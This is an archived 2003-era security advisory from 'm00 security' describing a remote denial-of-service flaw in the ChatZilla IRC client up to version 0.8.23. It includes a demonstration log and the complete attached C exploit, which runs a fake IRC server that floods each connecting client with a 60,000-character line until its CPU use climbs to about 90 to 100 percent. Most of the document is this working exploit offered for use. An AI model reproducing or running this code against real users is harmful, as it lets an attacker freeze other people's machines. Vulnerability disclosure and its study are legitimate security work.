TUCoPS :: Linux :: Apps A-M :: bt1091.txt

ChatZilla <=v0.8.23 remote DoS vulnerability 


--Boundary-00=_JiAZ/wSebLUeBzV
Content-Type: text/plain;
  charset="us-ascii"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

/**********************************************************
*
*                m00 security advistory #003
*
*    ChatZilla <=v0.8.23 remote DoS vulnerability
*
*                     www.m00security.org
*
************************************************************/

---------------------------------
Product: ChatZilla
Version: 0.8.23 and bellow
OffSite: www.mozilla.org
---------------------------------

Overview:

ChatZilla is a (popular?) linux irc-client. Mozilla/5.0 include it.

Problem description:

It's possible to freeze system by sending special request
with very long string (60kb) to ChatZilla. The vuln could be used
by IRC server. Look at the attached exploit source code for more
info. Example on localhost:

[root@localhost 0dd]# gcc -o m00-ChatZilla m00-ChatZilla.c
[root@localhost 0dd]# ./m00-ChatZilla 6667

ChatZilla <=v0.8.23 remote DoS exploit // www.m00security.org

[~] Generating evil buf.... OK
[+] fake ircd created on port 6667
[+] User connected. Attacking.... OK

[root@localhost 0dd]# ps -aux | grep mozilla-bin
satan     2128  0.0 12.3 49588 31564 ?       S    19:33   0:00 
/usr/lib/mozilla-1.3/mozilla-bin
satan     2118 29.4 12.3 49588 31564 ?       R    19:33   0:29 
/usr/lib/mozilla-1.3/mozilla-bin  <-----
satan     2127  0.0 12.3 49588 31564 ?       S    19:33   0:00 
/usr/lib/mozilla-1.3/mozilla-bin
satan     2129  0.0 12.3 49588 31564 ?       S    19:33   0:00 
/usr/lib/mozilla-1.3/mozilla-bin
satan     2130  0.0 12.3 49588 31564 ?       S    19:33   0:00 
/usr/lib/mozilla-1.3/mozilla-bin
satan     2131  0.0 12.3 49588 31564 ?       S    19:33   0:00 
/usr/lib/mozilla-1.3/mozilla-bin

....after ~10min CPU usage increase up to ~90% on Athlon XP 2000

[root@localhost 0dd]# ps -aux | grep mozilla-bin
satan     2128  0.0 12.4 49588 31820 ?       S    19:33   0:00 
/usr/lib/mozilla-1.3/mozilla-bin
satan     2118 88.8 12.4 49588 31820 ?       R    19:33  10:45 
/usr/lib/mozilla-1.3/mozilla-bin <-----
satan     2127  0.0 12.4 49588 31820 ?       S    19:33   0:00 
/usr/lib/mozilla-1.3/mozilla-bin
satan     2129  0.0 12.4 49588 31820 ?       S    19:33   0:00 
/usr/lib/mozilla-1.3/mozilla-bin
satan     2130  0.0 12.4 49588 31820 ?       S    19:33   0:00 
/usr/lib/mozilla-1.3/mozilla-bin
satan     2131  0.0 12.4 49588 31820 ?       S    19:33   0:00 
/usr/lib/mozilla-1.3/mozilla-bin

Exploit attached.

(c) m00 Security / d4rkgr3y [d4rk@securitylab.ru]


--Boundary-00=_JiAZ/wSebLUeBzV
Content-Type: text/x-csrc;
  charset="us-ascii";
  name="m00-ChatZilla.c"
Content-Transfer-Encoding: 7bit
Content-Disposition: attachment; filename="m00-ChatZilla.c"

/*
 *  ChatZilla <=v0.8.23 remote DoS exploit
 *
 *  by m00 Security // www.m00security.org
 *
 *  This sploit creats a fake irc-server on any port. Every connected
 *  ChatZilla-client will have cpu-usage 100%.
 *
 *  Complete advisory:
 *  www.m00security.org/adv/adv003.txt
 *
 *  -d4rkgr3y [d4rk@securitylab.ru]
 */

#include<sys/types.h>
#include<sys/socket.h>
#include<netinet/in.h>
#include<arpa/inet.h>
#include<unistd.h>
#include<signal.h>
#include<stdio.h>
#include<stdlib.h>
#include<string.h>

#define COUNT 60000
#define request "NOTICE AUTH :*** Welcome to fake m00 IRCd\n"

int main(int argc, char **argv)
{
	struct sockaddr_in db;
	int sock, i, len, lame;
	const c = COUNT;
	char buf[60000] = ":Serv 000 user666 :Welcome to the underworld";
	printf("\nChatZilla <=v0.8.23 remote DoS exploit // www.m00security.org\n\n");
	if (argc!=2){
		printf("[-] error in params. Usage\n %s port\n",argv[0]);
		exit(1);
	} else {
		printf("[~] Generating evil buf....");
	}
	/* constructing evil buf */
	for (i=0;i<c;i++)
	{
		strcat(buf,"A");
	}
	strcat(buf,"\n");
	printf(" OK\n");
	/* creating fake irc-server */
	db.sin_family = AF_INET;
	db.sin_addr.s_addr = INADDR_ANY;
	db.sin_port = htons(atoi(argv[1]));
	sock = socket(PF_INET, SOCK_STREAM, 0);
	if(bind(sock, (struct sockaddr*)&db, sizeof(db)) == -1) {
		perror("[-] bind()");
		_exit(0);
	}
	/* OK */
	printf("[+] fake ircd created on port %s\n",argv[1]);
	/* waiting for connect */
	listen(sock, SOMAXCONN);
	while(1) {
		printf("[+] User connected. Attacking....");
		len = sizeof(db);
		lame = accept(sock, (struct sockaddr*)&db, &len);
		/* go go go */
		write(lame,request,strlen(request));
		write(lame,buf,strlen(buf));
		printf(" OK\n");
		close(lame);
		close(sock);
		return(0);
	}
}

--Boundary-00=_JiAZ/wSebLUeBzV--

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH